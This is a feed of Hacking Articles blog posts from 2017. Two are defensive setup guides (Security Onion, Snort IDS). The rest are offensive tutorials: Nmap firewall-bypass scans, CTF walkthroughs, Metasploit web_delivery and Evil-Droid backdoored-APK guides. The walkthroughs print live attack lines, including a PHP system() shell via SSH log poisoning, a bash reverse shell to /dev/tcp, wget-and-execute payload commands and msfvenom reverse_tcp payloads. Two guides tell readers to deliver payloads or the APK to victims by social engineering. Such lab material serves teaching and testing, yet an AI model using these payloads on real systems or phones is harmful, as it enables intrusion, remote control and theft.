News from 'Hacking Articles'

Syndicate content
Raj Chandel's Blog
Updated: 9 min 47 sec ago

Security Onion Configuration in VMware

Fri, 08/Dec/2017 - 20:59

Security Onion is a Linux distro for intrusion detection, network security monitoring, and log management. It’s based on Ubuntu and contains Snort, Suricata, Bro, OSSEC, Sguil, Squert, ELSA, Xplico, NetworkMiner, and many other security tools. The easy-to-use Setup wizard allows you to build an army of distributed sensors for your enterprise in minutes!

Security Onion effortlessly merges collectively two main roles i.e. complete packet capture another Network-based [NIDS] and host-based intrusion detection systems [HIDS].

There are some Analysis tool are available that also work as real time program by capturing network packets.

NIDS: Snort or Suricata and Bro as network intrusion detection for fingerprints and identifiers that contest identified malicious, abnormal otherwise suspicious traffic.

HIDS:  Security Onion offers OSSEC for host-based intrusion detection.

Sguil: It is the crucial Security Onion tool for network security analysts. Sguil’s main component is an intuitive GUI that gives access to real-time events, session data, and raw packet captures.

Squert: It is a web application that is used to query and view event data stored in a Sguil database.

ELSA: Enterprise Log Search and Archive is a three-tier log receiver, archiver, indexer, and web frontend for incoming syslog. 

For more details visit here

Let’s start!!

Create VM for Security Onion installation

Open vmware, select option “creates new virtual machine”, now for install from wizard select second option:

Install disc image file in order to browser iso file of security onion.

Then click on next.

Now select 2nd option “Linux” for guest operating system and select version “ubuntu”. Then click on next and next as per your requirements.

Explore custom hardware for making following changes:

Select bridges connection and enable the check box for replicate connection for network adapter setting. Similarly add one more network adapter and also select bridges connection for 2nd adapter

Then click on finish.

Installation

It will start booting the vm automatically, now for SECURITY ONION

At welcome screen; Select language and click “Continue”. Here we have chosen English as preferred language.

Read the content and then click on “Continue”.

Choose the radio button for “Erase the disk and install Security Onion” to begin installation and click “Install Now”

Click on “Continue” then it will proceed for disk partitions.

Check your location, without holdup, select your time zone and then click on “Continue”.

Choose keyboard layout “English (US)” and then click on “Continue”.

Now create your profile by giving yours detail as given below:

Enter your name: Ignite

Enter your computer’s name: Ignite-pc

Select a username: Ignite

Enter a password: 1234

Click “Continue”

Now it may take some time in installation, but after that when installation is complete. Click “Restart Now” for new installation.

Security onion configuration 1st part

In order to configure security onion as real time system for NIDS and HIDS we have divided configuration setting in two parts.

Now enter your username and password for login as shown in given below image.

At Desktop screen you have can see setup icon; click on “setup” icon for configuration of network interface.

Configure 1st network adapter for management interface

Click on “setup” icon present at desktop to configure security onion on your system.

Click “Yes, Continue”

Click “Yes” to configure /etc/network/interface now as shown in given below image.

Choose eth0 as network interface should be the management interface as shown in given below image.

Choose Static addressing for eth0 utilization as shown in given below image.

Enter a static IP for your management interface as shown in given image.

Enter subnet mask of for static addressing as shown in given below image.

Enter gateway as shown in given below image.

Enter DNS server IP it can be 192.168.1.1 or 8.8.8.8 or can be both separated by spaces.

Enter you local domain name as shown in given below image.

Configure 2nd network adapter for sniffing interface

Click “Yes” to configure sniffing interfaces now as shown in given below image.

Choose eth1 as network interface should be used for sniffing interface.

 

Given below image is showing brief details of network interface configuration. Click yes to precede further step.

Network configuration is completed now click “Yes Reboot”

Security onion configuration 2nd part

Now once it restarts, again click on “setup” icon for further configuration of security onion setup as real-time machine. Then click “yes, Continue”.

Since we had already configure network interface therefore click on “yes, Skip network configuration”

Select “Stable setup” which will configure ELSA; then Click OK.

Select “Evaluation Mode” which configure Snort and Bro to monitor one network interface; then Click OK

Select eth1 for 2nd network interface that should be monitored as shown in given image.

Now add a username for Sguil, Squert and ELSA a shown in given below image.

Enter password for username used while you want to login into Sguil, Squert and ELSA a shown in given below image.

Now again next dialoge box will display brief detain for configuration setting. Click on “yes, proceed with changes”

Here it will proceed for stopping all NSM services which manages all network services from creation to deletion.

Security Onion configuration is now completed. You will see it will launch icon for SGUIL, Squert and ELSA. Now click on squil icon and then enter username and password to login into sguil.

Select network eth1 to be monitor as shown in given below image and click on “start SGUIL”

It will work as real time system and start capturing traffic as shown in given below image.

Great!! Now analysis your network traffic will real-time machine

Author: Sanjeet Kumar is a Information Security Analyst | Pentester | Researcher  Contact Here

The post Security Onion Configuration in VMware appeared first on Hacking Articles.

Categories: Cyber India

Understanding Guide to Nmap Firewall Scan (Part 2)

Sat, 02/Dec/2017 - 22:30

In our previous article we had demonstrated “Nmap firewall scan (part 1)” by making use of Iptable rules and then try to bypass firewall filter to perform NMAP Advance scanning, today we are going to discuss second part of it.  

Requirement

Attacker: Kali Linux

Target: Ubuntu  

Spoof MAC Address Scan

Allow TCP Packet from Specific Mac Address

If network admin wants to establish TCP connect from specific MAC address and do not want to connect with other system then he could use following Iptable rules to apply firewall filter in his network.  

iptables -I INPUT -p tcp -m mac –source-mac “AA:AA:AA:AA:AA:AA” -j ACCEPT

iptables -I INPUT -p tcp -j REJECT –reject-with tcp-reset

Now when attacker will perform basic network scanning on target’s network, he could not able to enumerate ports and running service of victim’s system.

nmap 192.168.1.117

In order to bypass above applied filter attacker may run netdiscover command or nmap Host Scan in Kali Linux terminal to identify the active host in the network. As result he will get a table which contains MAC address and IP address of active host in local network.

Now either use one by one all MAC address in nmap command or save all MAC address in a text file and give its path in nmap command but to perform this attacker first need to enable “Promiscuous mode” of his network. Well, to do so type given below commands first for Promiscuous mode and second for nmap scanning.

ip link set eth0 promisc on

nmap –spoof-mac AA:AA:AA:AA:AA:AA 192.168.1.117

Hence if you are lucky to spoof correct Mac address then you can easily bypass the firewall filter and able to establish TCP connect with victim’s network for port enumeration.

Nice!!! If you will notice in given below image you will observe open ports of target’s network.

Allow TCP Packet from Specific IP

If network admin wants to establish TCP connect from specific IP and do not want to connect with other system then he could use following Iptable rules to apply firewall filter in his network. 

iptables -I INPUT -p tcp -j REJECT –reject-with tcp-reset

iptables -I INPUT -p tcp -s 192.168.1.120 -j ACCEPT

Now when again attacker will perform basic network scanning on target’s network, he could not able to enumerate ports and running service of victim’s system.

nmap 192.168.1.117

Spoof IP Address

In order to bypass above applied filter attacker may again run netdiscover command or nmap Host Scan in Kali Linux terminal to identify the active host in the network. As result he will get a table which contains MAC address and IP address of active host in local network.

Now either use one by one all IP address in nmap command or save all IP address in a text file and give its path in nmap command and then execute following command:

nmap -e eth0 -S 192.168.1.120 192.168.1.117

Hence if you are lucky to spoof correct IP address then you can easily bypass the firewall filter and able to establish TCP connect with victim’s network for port enumeration.

Great!! If you will notice in given below image you will observe open ports of target’s network.

Data-String Scan

Allow TCP Packet from Specific String

If network admin wants to establish TCP connect from a system which contain specific string and do not want to connect with other system does not contain that special string packets then he could use following Iptable rules to apply firewall filter in his network. 

iptables -I INPUT -p tcp -m string –algo bm –string “Khulja sim sim” -j ACCEPT

iptables -A INPUT -p tcp -j REJECT –reject-with tcp-reset

In above rule you can see we had used “Khulja sim sim” as special string to establish TCP connection. Hence only those TCP connection could be establish which contain “Khulja sim sim”in packets.

Now when again attacker will perform basic network scanning on target’s network, he could not able to enumerate ports and running service of victim’s system because traffic generate from his network does not contain special string in packets thus firewall of target system will discard all TCP packet of attacker’s network.

nmap 192.168.1.117

If attacker somehow sniffs special string “khulja sim sim” to connect with target’s network then he could use –data-string argument in nmap command to bypass the firewall.

nmap –data-string “Khulja sim sim” 192.168.1.117

Hence if you are lucky to sniff correct data string then you can easily bypass the firewall filter and able to establish TCP connect with victim’s network for port enumeration.

Wonderful!! If you will notice given below image you will observe open ports of target’s network.

Hex String Scan

Allow TCP Packet from Specific Hex String

If network admin wants to establish TCP connect from a system which contain hexadecimal value of particular string and do not want to connect with other system does not contain hexadecimal value of that special string in packets then he could use following Iptable rules to apply firewall filter in his network. 

iptables -I INPUT -p tcp -m string –algo kmp –hex-string “RAJ” -j ACCEPT

iptables -A INPUT -p tcp -j REJECT –reject-with tcp-reset

In above rule you can see we had used hex value for “RAJ” as special string to establish TCP connection. Hence only those TCP connection could be established which contain hex value of “RAJ” in packet.

Now when again attacker will perform basic network scanning on target’s network, he could not able to enumerate ports and running service of victim’s system because traffic generate from his network does not contain hex value of special string in packets thus firewall of target system will discard all TCP packet of attacker’s network.

nmap 192.168.1.117

If attacker somehow sniffs special string “RAJ” to connect with target’s network then he could used its hex values with –data argument in nmap command to bypass the firewall.

nmap –data “\x52\x41\x4a” 192.168.1.117

Hence if you are lucky to sniff correct hex value of particular data string then you can easily bypass the firewall filter and able to establish TCP connect with victim’s network for port enumeration.

Hence, if you will notice given below image you will observe open ports of target’s network.

IP-Options Scan

Reject TCP Packets contains tcp-option

By default nmap sends 24 bytes of TCP data in which 4 bytes of data is reserve for TCP Options if network admin reject 4 bytes tcp –option packet to discord tcp connection to prevent his network from scanning. Type following iptable rule to reject 4 bit tcp-option in his network:

 iptables -A INPUT -p tcp –tcp-option 4  -j REJECT –reject-with tcp-reset

Now when attacker will perform TCP scanning [sT] on target’s network, he could not able to enumerate ports and running service of victim’s system. Since tcp-option is 4 bytes hence firewall discard tcp packet of attacker’s network.

nmap -sT 192.168.1.117

The IP protocol gives numerous options that could be placed in packet headers. Contrasting the omnipresent TCP options, IP options are seldom observed because of security reasons. The most powerful way to specify IP options is to simply pass in hexadecimal data as the argument to –ip-options.

Precede every hex byte value with \x. You may repeat certain characters by following them with an asterisk and then the number of times you wish them to repeat. For example, \x01\x07\x04\x00*4 is the same as\x01\x07\x04\x00\x00\x00\x00 this is also called NuLL bytes

Now type following command with ip-option argument as shown below:

nmap –ip-option “\x00\x00\x00\x00\x00*” 192.168.1.117

Note that if you denote a number of bytes that is not a multiple of four; an incorrect IP header length will be set in the IP packet. The reason for this is that the IP header length field can only express multiples of four. In those cases, the length is computed by dividing the header length by 4 and rounding down. 

GOOD! If you will notice given below image you will observe open ports of target’s network.

https://nmap.org/book/nping-man-ip-options.html

The post Understanding Guide to Nmap Firewall Scan (Part 2) appeared first on Hacking Articles.

Categories: Cyber India

Hack The Ether: EvilScience VM (CTF Challenge)

Thu, 30/Nov/2017 - 20:38

Hello friends! Today we are going to take another CTF challenge known as The Ether: EvilScience. The credit for making this vm machine goes to “f1re_w1re” and it is another boot2root challenge where we have to root the server to complete the challenge. You can download this VM here.

Let’s Breach!!!

Let us start form getting to know the IP of VM (Here, I have it at 192.168.1.146 but you will have to find your own)

netdiscover

Use nmap for port enumeration.

nmap -sV 192.168.1.146

Nmap scan shows us port 80 is open, so we open the ip address in our browser.

We find that the site is vulnerable to LFI. Going through the pages we find that the index.php file is vulnerable to LFI

We can access auth.log with LFI. We use burpsuite to check the response and we find that we can use ssh log poisoning to get access to server.

We now login with username as basic php shell to use command injection.

ssh ‘<?php system($_GET[‘C’]);?>’@192.168.1.146

Now we check if log injection is possible we try to run ‘ls’ command and find that log injection is possible.

We use web_delivery script in metasploit to gain reverse shell.

msf > use multi/script/web_delivery

msf exploit(web_delivery) > set target 1

msf exploit(web_delivery) > set payload php/meterpreter/reverse_tcp

msf exploit(web_delivery) > set lhost 192.168.1.131

msf exploit(web_delivery) > set lport 4444

msf exploit(web_delivery) > run

Now we run python to run our web delivery script to bypass the firewall.

As soon as we get send the request we get the reverse shell.

Now we spawn tty shell with python.

python -c ‘import pty; pty.spawn(“/bin/bash”);’

Now we take look at the sudoers file. We find that we don’t need need password to run a python file as root.

Now we run the file as root. When we run the file we find that it opens log file so we use pipe to run our commands. We run id command and find that we can execute commands as root.

Now we setup our listener using netcat.

nc -lvp 5555

Now we create a python shell and save it into our /var/www/html folder.

We download it inside /tmp folder on the target VM using wget.

wget http://192.168.1.108/shell.py -O /tmp/shell.py

Let’s run the shell using python program in the target machine.

Now as soon as we run the shell we get the reverse shell. We run the id command to check the user. We move to the root directory and find an image file called flag.png

We check the strings inside the image using tail command.

tail flag.png

Inside the image file we find a flag in base64 encode.

We decode the base64 encoded string.

echo ‘base64-encoded-string’ | base64 -d

Author: Sayantan Bera is a technical writer at hacking articles and cyber security enthusiast. Contact Here

The post Hack The Ether: EvilScience VM (CTF Challenge) appeared first on Hacking Articles.

Categories: Cyber India

Command Injection Exploitation using Web Delivery (Linux, Windows)

Thu, 30/Nov/2017 - 17:34

Hello friends! In this article you will learn how to exploit three different platform [Linux, windows, using single exploit of metasploit framework.

Requirement

Attacker:Kali Linux

Targeted platform: Window,PHP,Linux[ubuntu]

Open the terminal in your kali Linux and type “msfconsole” to load metasploit framework and execute given below exploit.

This module quickly fires up a web server that serves a payload. The provided command which will allow for a payload to download and execute. It will do it either specified scripting language interpreter or “squiblydoo” via regsvr32.exe for bypassing application whitelisting. The main purpose of this module is to quickly establish a session on a target machine when the attacker has to manually type in the command: e.g. Command Injection, RDP Session, Local Access or maybe Remote Command Execution. This attack vector does not write to disk so it is less likely to trigger AV solutions and will allow privilege escalations supplied by Meterpreter. When using either of the PSH targets, ensure the payload architecture matches the target computer or use SYSWOW64 powershell.exe to execute x86 payloads on x64 machines. Regsvr32 uses “squiblydoo” technique for bypassing application whitelisting. The signed Microsoft binary file, Regsvr32, is able to request an .sct file and then execute the included PowerShell command inside of it. Both web requests (i.e., the .sct file and PowerShell download/execute) can occur on the same port. “PSH (Binary)” will write a file to the disk, allowing for custom binaries to be served up to be downloaded/executed.

use exploit/multi/script/web_delivery

msf exploit (web_delivery)>show targets

From given below image you can observe that there are 5 targets, which help you in generating malicious code to create backdoor in victim system.

Exploit Linux Platform [python]

use exploit/multi/script/web_delivery

msf exploit (web_delivery)>set lhost 192.168.1.132 (IP of Kali Linux)

msf exploit (web_delivery)>set lport 4444

msf exploit (web_delivery)>set target 0

msf exploit (web_delivery)>set payload python/meterpreter/reverse_tcp

msf exploit (web_delivery)>run

In this exploit we had set target 0 to generate malicious code for python platform, from given below image you can observe the highlighted malicious python code, now copy it and send to victim using social engineering method.

As soon as victim will execute the malicious code in terminal, attacker will obtain meterpreter session as unauthorized access of victim system.

Exploit Linux Platform [PHP]

use exploit/multi/script/web_delivery

msf exploit (web_delivery)>set lhost 192.168.1.132 (IP of kali Linux)

msf exploit (web_delivery)>set lport 4444

msf exploit (web_delivery)>set target 1

msf exploit (web_delivery)>set payload php/meterpreter/reverse_tcp

msf exploit (web_delivery)>run

Now we had set target 1 to generate malicious code for php platform, from given below image you can observe the highlighted malicious php code, now copy it and send to victim using social engineering method.

As soon as victim will execute the malicious code in web browser, attacker will obtain another meterpreter session as unauthorized access of victim system.

Exploit Windows Platform [exe]

use exploit/multi/script/web_delivery

msf exploit (web_delivery)>set lhost 192.168.1.132

msf exploit (web_delivery)>set lport 4444

msf exploit (web_delivery)>set target 2

msf exploit (web_delivery)>set payload windows/meterpreter/reverse_tcp

msf exploit (web_delivery)>run

Further we had set target 2 to generate malicious code for window platform, from given below image you can observe the highlighted malicious powershell.exe, now copy it and send to victim using social engineering method.

As soon as victim will execute the malicious code in command prompt, attacker will obtain meterpreter session as unauthorized access of victim system.

Exploit Windows Platform [DLL]

use exploit/multi/script/web_delivery

msf exploit (web_delivery)>set lhost 192.168.1.132

msf exploit (web_delivery)>set lport 4444

msf exploit (web_delivery)>set target 3

msf exploit (web_delivery)>set payload windows/meterpreter/reverse_tcp

msf exploit (web_delivery)>run

In this exploit we had set target 3 to generate malicious code for window platform, from given below image you can observe the highlighted malicious dll code, now copy it and send to victim using social engineering method.

As soon as victim will execute the malicious code as run command inside RUN window, attacker will again obtain meterpreter session, and make an unauthorized access in victim system.

Exploit Windows Platform [Powershell Binary]

use exploit/multi/script/web_delivery

msf exploit (web_delivery)>set lhost 192.168.1.132

msf exploit (web_delivery)>set lport 4444

msf exploit (web_delivery)>set target 4

msf exploit (web_delivery)>set payload windows/meterpreter/reverse_tcp

msf exploit (web_delivery)>run

In this exploit we had set target 4 to generate malicious code for windows platform, from given below image you can observe the highlighted malicious powershell.exe binary code, now copy it and send to victim using social engineering method.

As soon as victim will execute the malicious code in command prompt, attacker will obtain meterpreter session as unauthorized access of victim system.

Hence a single exploit “web delivery script” is quite helpful to hack three different platforms.

Author: Sanjeet Kumar is a Information Security Analyst | Pentester | Researcher  Contact Here

The post Command Injection Exploitation using Web Delivery (Linux, Windows) appeared first on Hacking Articles.

Categories: Cyber India

IDS, IPS Penetration Testing Lab Setup with Snort

Wed, 29/Nov/2017 - 21:34

Hello friends! As you people must be aware of various types of security issues facing by IT sector originations daily. There are so many types of firewall and IDS or third party software available to shoot out major different types of security issues in the network.

In this article you will learn how to configure the famous “SNORT as IDS” of IT sector originations which work as real-time machine.

Snort is software created by Martin Roesch, which is widely use as Intrusion Prevention System [IPS] and Intrusion Detection System [IDS] in network. It is separated into the five most important mechanisms for instance: Detection engine, Logging and alerting system, Packet decoder, Preprocessor and Output modules.

The program is quite famous to carry out real-time traffic analysis, also used to detect query or attacks, packet logging on Internet Protocol networks, to detect malicious activity, denial of service attacks and port scans by monitoring network traffic, buffer overflows, server message block probes, and stealth port scans.

Snort can be configured in three main modes:

  • Sniffer mode: it will observe network packets and present them on the console.
  • Packet logger mode: it will record packets to the disk.
  • Intrusion detection mode: the program will monitor network traffic and analyze it against a rule set defined by the user.

After that the application will execute a precise action depend upon what has been identified.

Let’s Begin!!

Snort Installation

We had chosen ubuntu 14.04 operating system for installation and configuration of snort. Earlier than installing snort in your machine, you should need to install necessary dependencies of ubuntu. Therefore open the terminal and type given below command to install pre-requisites:

sudo apt-get install -y build-essential libpcap-dev libpcre3-dev libdumbnet-dev bison flex zlib1g-dev

Now create a folder to download snort and its dependencies package inside. Type given below commands to create a folder “snort-src” and move inside it to download DAQ-2.0.6

mkdir ~/snort_src && cd ~/snort_src

wget https://snort.org/downloads/snort/daq-2.0.6.tar.gz

Snort need to set up the DAQ, or Data Acquisition library, for packet I/O.  The DAQ change direct calls into lib pcap functions with an abstraction layer that facilitates operation on a variety of hardware and software interfaces without requiring changes to Snort.  It is possible to select the DAQ type and mode when invoking Snort to perform pcap read back or inline operation, etc.  The DAQ library may be useful for other packet processing applications and the modular nature allows you to build new modules for other platforms.

From given below image you can confirm that we had successfully downloaded daq-2.0.6 tar file.

Now execute given below command to extract tar file.

tar xvfz daq-2.0.6.tar.gz

Move inside daq-2.0.6 folder by executing given below first command and then execute second command for automatically installation and configuration.

cd daq-2.0.6

./configure && make && sudo make install

Till here you had learn how install daq-2.0.6 for snort.

Now again move into snort-src folder and type given below command to download latest version of snort-2.9.11

wget https://snort.org/downloads/snort/snort-2.9.11.tar.gz

From given below image you can confirm that we had successfully downloaded snort-2.9.11 tar file.

Now execute given below command to extract tar file.

tar xvfz snort-2.9.11.tar.gz

Move inside snort-2.9.11 folder by executing given below first command and then execute second command for automatically installation and configuration.

cd snort-2.9.11

./configure –enable-sourcefire && make && sudo make install

Run following command to manage and install shared libraries

sudo ldconfig

Type given below command for generating symbolic link

sudo ln -s /usr/local/bin/snort /usr/sbin/snort

A symbolic link also known as soft link is a file system entry that points to the file name and location. Deleting the symbolic link does not remove the original file. If, on the other hand, the file to which the soft link point is removed, the soft link stops working, it is broken.

Now execute given below command that snort to verify itself by testing its installation and configuration.

snort –V

The first part of snort installation finished here

Configure Snort to in IDS Mode in Network

Execute given below command to create the snort user and group, where snort will run as an unprivileged user.

sudo groupadd snort

sudo useradd snort -r -s /sbin/nologin -c SNORT_IDS -g snort

Above command will create a group as “snort” and add a member “snort” into it.

Now further we need to make some directories which Snort suppose at the timing of running in IDS mode in network. Snort stores configuration files in /etc/snort; rules in /etc/snort/rules; store compile rules in  /usr/local/lib/snort_dynamicrules, and stores its logs in /var/log/snort:

Type given below command to create the Snort directories:

sudo mkdir /etc/snort

sudo mkdir /etc/snort/rules

sudo mkdir /etc/snort/rules/iplists

sudo mkdir /etc/snort/preproc_rules

sudo mkdir /usr/local/lib/snort_dynamicrules

sudo mkdir /etc/snort/so_rules    

Type given below command to create some files that stores rules and ip lists

sudo touch /etc/snort/rules/iplists/black_list.rules

sudo touch /etc/snort/rules/iplists/white_list.rules

sudo touch /etc/snort/rules/local.rules

sudo touch /etc/snort/sid-msg.map

Type given below command to create our logging directories:

sudo mkdir /var/log/snort

sudo mkdir /var/log/snort/archived_logs

Type given below command to adjust permissions:

sudo chmod -R 5775 /etc/snort

sudo chmod -R 5775 /var/log/snort

sudo chmod -R 5775 /var/log/snort/archived_logs

sudo chmod -R 5775 /etc/snort/so_rules

sudo chmod -R 5775 /usr/local/lib/snort_dynamicrules

Snort required some configuration files and the dynamic preprocessors to be copied from the Snort source folder into the /etc/snort folder therefore execute given below command for that.

cd snort_src/snort-2.9.11/etc/

sudo cp *.conf* /etc/snort

 sudo cp *.map /etc/snort

 sudo cp *.dtd /etc/snort

cd snort_src/snort-2.9.11/src/dynamic-preprocessors/build/usr/local/lib/snort_dynamicpreprocessor/

sudo cp * /usr/local/lib/snort_dynamicpreprocessor/

Editing snort configuration file

Now we need to comment out all rulesets with the following command:

sudo sed -i “s/include \$RULE\_PATH/#include \$RULE\_PATH/” /etc/snort/snort.conf

After then open the configuration file using gedit for making some changes inside.

sudo gedit /etc/snort/snort.conf

 

Scroll down the text file near line number 45 to specify your network for protection as shown in given image.

#Setup the network addresses you are protecting

 ipvar HOME_NET 192.168.1.1/24 

Now again scroll down near line number 108 to set the path of your rule file which you had created above for storing snort rules, as shown in given below image.

var RULE_PATH /etc/snort/rules

var SO_RULE_PATH /etc/snort/so_rules

var PREPROC_RULE_PATH /etc/snort/preproc_rules

var WHITE_LIST_PATH /etc/snort/rules/iplists

var BLACK_LIST_PATH /etc/snort/rules/iplists

One more time scroll down the text near line number 546 to uncomment highlighted text.

include $RULE_PATH/local.rules   

Save the file and close it once all the editing is done in snort configuration file. 

Now once again we need to verify its configuration setting therefore execute following command to test it.

sudo snort -T -i eth0 -c /etc/snort/snort.conf

Now it will compile the complete file and test the configuration setting automatically as shown in given below image:

Great!! We had successfully configured snort as IDS for protecting our network.

Reference link

Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here

The post IDS, IPS Penetration Testing Lab Setup with Snort appeared first on Hacking Articles.

Categories: Cyber India

Hack the Depth VM (CTF Challenge)

Wed, 29/Nov/2017 - 15:28

Hello friends! Today we are going to take another CTF challenge known as Depth. The credit for making this vm machine goes to “Dan Lawson” and it is another boot2root challenge where we have to root the server to complete the challenge. You can download this VM here.

Let’s Breach!!!

Here, I have it at 192.168.1.135 but you may have a different one.

Let’s enumerate the ports using nmap

nmap -sV 192.168.135

Nmap scan shows us port 8080 is open, so we open it in our browser.

We don’t find anything on the index page, but nikto shows us a page called test.jsp.

nikto -h http://192.168.1.135:8080

We open it and find a page that it is used for looking into directories of the system.

We run ‘ls -al’ to check if it is working.

ls -al /tmp

When we take a look inside /home/ folder we find a user called bill.

ls -l /home

Now we find that site has a vulnerability we can change this utility into command injection. We find that with the help of ssh command we can bypass the firewall.

ssh bill@localhost sudo -l

We find that we can run commands using ssh. Now we disable the firewall.

ssh bill@localhost sudo ufw disable

Now to gain reverse shell we setup our listener using netcat.

nc -lvp 4444

After disabling the firewall, we use bash reverse shell to gain access.

ssh bill@localhost bash -i >& /dev/tcp/192.168.1.135/4444 0>&1

Now as soon as we get reverse shell we go into root folder after entering root folder we get a file called flag.

We open the flag file and find a congratulatory message for the completion of the CTF challenge.

Author: Sayantan Bera is a technical writer at hacking articles and cyber security enthusiast. Contact Here

The post Hack the Depth VM (CTF Challenge) appeared first on Hacking Articles.

Categories: Cyber India

Hack the G0rmint VM (CTF Challenge)

Mon, 27/Nov/2017 - 20:26

Hello friends! Today we are going to take another CTF challenge known as G0rmint. The credit for making this vm machine goes to “Noman Riffat” and it is another boot2root challenge where we have to root the server to complete the challenge. You can download this VM here.

Let’s Breach!!!

Let us start form getting to know the IP of VM (Here, I have it at 192.168.1.134 but you will have to find your own)

netdiscover

Use nmap for port enumeration.

nmap 192.168.1.134

Nmap scan shows us port 80 is open, so we open the ip address in our browser.

We don’t find any page. So we use dirb to find the directories for more information.

dirb http://192.168.1.134/

We open robots.txt and find a directory called /g0rmint/

When we open the directory we find a login page.

We take a look at the source code for more information.

 

When we take a look at the source code we find a backup directory called s3cretbackupdirectory/ We use dirb to enumerate files or pages in that directory.

dirb http://192.168.1.134/g0rmint/s3cretbackupdirect0ry

We find a page called info.php when we open it we find a file name backup.zip.

We download the file for further information.

We extract the zip file and find that the file contains the source code for the webpage.

Now we take look inside style.css and we look at the name of the author.

cat style.css | grep Author

We use these details as username and email for reset password.

We now take a look at reset.php file.

We find that the new password is based on the time we reset our password. We create a  php file that generates a password based on the time displayed on the page.

Now we generate the password using our php script.

We go to the login page and use the email we find in the css file and use the password we just generated to login.

Now that we are authorized we take a look at the log file. In the config.php  we find that the logs are stored in s3r3t-dir3ct0ry-f0r-l0gs/ directory in the file name  format yy-mm-dd.php

Now we use the current date to open the log file.

Now we use upload basic php shell through email address. We put base64 decode so that we can bypass input firewall.

Now we convert our commands to base64, then we use those base64 encoded string to execute our command in the server.

When we execute our command the server runs it and we are able to see the files in that directory of the server.

Now we create an elf shell with msfvenom.

msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=192.168.1.116 lport=4444 -f elf > /var/www/html/shell

To upload our shell, we convert our commands to base64.

echo ‘wget http://192.168.1.116/shell; chmod +x shell; ./shell’ | base64

Now we setup our listener using metasploit.

msf > use multi/handler

msf exploit(handler) > set payload linux/x86/meterpreter/reverse_tcp

msf exploit(handler) > set lhost 192.168.1.116

msf exploit(handler) > set lport 4444

msf exploit(handler) > run

Now when we execute our command we get our reverse_shell

Now going through the files in the /var/www folder we find a file called backup.zip. when we try to extract it we find that it can be only extracted in tmp folder so we extract the zip file in /tmp/ folder.

unzip backup.zip -d /var/tmp

After extracting the zip file, we take a look inside the folder we extracted the files we find a sql file.

When we open the file we find a md5 encode password for the user g0rmint.

cat /var/tmp/db.sql | grep noman

Then we when we decrypt our md5 encode hash we find a password ‘tayyab123’.

We use this to connect through ssh.

ssh g0rmint@192.168.1.116

After connecting through ssh we use this password to gain root access.

When we get root access we go to root folder inside the root folder we get a file called flag.txt. when we open the file we get a congratulatory message for the completion of VM.

Author: Sayantan Bera is a technical writer at hacking articles and cyber security enthusiast. Contact Here

The post Hack the G0rmint VM (CTF Challenge) appeared first on Hacking Articles.

Categories: Cyber India

Android Mobile Exploitation with Evil-Droid

Mon, 27/Nov/2017 - 18:04

Hello friends! Today you will learn how to generate apk payload with help of “Evil-Droid”. It is the tool use to compromise any android deceive for attacking point, we are using it only for educational purpose.

Evil-Droid is a framework that creates & generates & embed apk payload to penetrate android platforms.

Requirement:

Attacker: Kali Linux

Target: Android

Lets Begin !!

Open the terminal in your kali Linux and execute given below command to download it from git hub.

git clone https://github.com/M4sc3r4n0/Evil-Droid.git

Now open the downloaded folder in terminal and type given below command to give all permission to the script “evil-droid”

chmod 777 evil-droid

Now execute given below command to run the script and lunch the evil-droid application.

./evil-droid

When you will execute above command evil-droid will start as shown in given below image. Here it will start from testing internet connection and its dependencies from available kali Linux tool by its own.

Then a prompt will pop up to confirm Evil droid framework requirement, here select option “yes”.

Now Evil droid framework will get open to hack remote android platform by execute given below options.

[1] APK MSF                                    

[2] BACKDOOR APK ORIGINAL (OLD)                

[3] BACKDOOR APK ORIGINAL (NEW)                

[4] BYPASS AV APK (ICON CHANGE)                

[5] START LISTENER                             

[c] CLEAN                                       

[q] QUIT                                       

[?] Select

From given below image you can perceive that we had choose option as “BACKDOOR APK ORIGINAL”

After that again a prompt will pop up in order to set LHOST [attacker’s IP] for reverse connection. Enter your kali Linux IP in given text field as shown in given below image.

After that again a prompt will pop up in order to set LPORT for reverse connection as shown in given below image.

In next prompt enter payload name you want to give to your apk payload as shown in given below image. Here I had given baidu-broswer name to my payload.

Now when everything is set by attacker for generating an apk payload at last he will get a list for payload option to choose type of payload he wants to generate as shown in given below image.

Here I had selected “android/meterpreter/reverse_http” as payload.

Now download any original apk file from Google in order to hide your payload in that file. Here I had downloaded baidu.apk to hide my baidu-browser payload inside it; you can download any other apk file of your choice.

This will now generate a malicious baidu.apk by hiding our backdoor inside it as shown in given below image. Now copy this malicious apk from given path /root/Evil-Droid/evilapk/baidu-browser.apk and send it to victim.

On other hand another prompt will pop up to choose following option:

  • Multi-Handler
  • Attack-vector
  • Main menu
  • Exit

From given below image you can observe that I had choose “multi handler” for reverse connection of victims system.

Now it will lunch multi-handler and start reverse TCP handler on attacker machine as shown in given below image. As soon as victim will download and run the malicious baidu.apk, attacker will get unauthorized access of his deceive on his machine.

Great!! From given below image you can observe meterpreter session 1 is opened

meterpreter> sysinfo

Author: Sanjeet Kumar is a Information Security Analyst | Pentester | Researcher  Contact Here

 

The post Android Mobile Exploitation with Evil-Droid appeared first on Hacking Articles.

Categories: Cyber India

Understanding Guide to Nmap Firewall Scan (Part 1)

Thu, 23/Nov/2017 - 21:10

Hello friends, several times you might have used NMAP to performing Network scanning for enumerating active Port services of target machine but in some scenario it is not possible to perform scanning  with help of basic scan method especially in case of firewall filter.

Today we are going to demonstate “Nmap firewall scan” by making use of Iptable rules and try to bypass firewall filter to perfrom NMAP Advance scanning. 

Let’s Begin!!

Attacker’s IP: 192.168.0.107 [kali linux]

Target’s IP: 192.168.0.101 [ubuntu]

ANALYSIS TCP SCAN

Open the terminal in your kali linux and execute following command to perform TCP[sT] scan for open port enumeration.

nmap -sT -p22 192.168.1.101

From given below image you can observe we had scanned port 22 as result it has shown Port 22 is Open for SSH service.

When you will use wireshark in order to capture the packet send in the case of TCP while network is being scanning , here you need to notice few things such as “flag,Total length and time to live[TTL]” [in layer3].

Following table contains detail of Flag, Data length and TTL in diffrent scanning method:

 

Scan Name Flag Data Length TTL -sT (TCP) SYN →

← SYN, ACK

ACK →

RST, ACK → 60 64 -sS (Stealth) SYN →

← SYN, ACK

RST, ACK → 44 <64 (Less than 64) -sF (Finish) FIN → 40 <64 (Less than 64) -sN (Null) NULL → 40 <64 (Less than 64) -sX (Xmas) FIN, PSH, URG → 40 <64 (Less than 64)

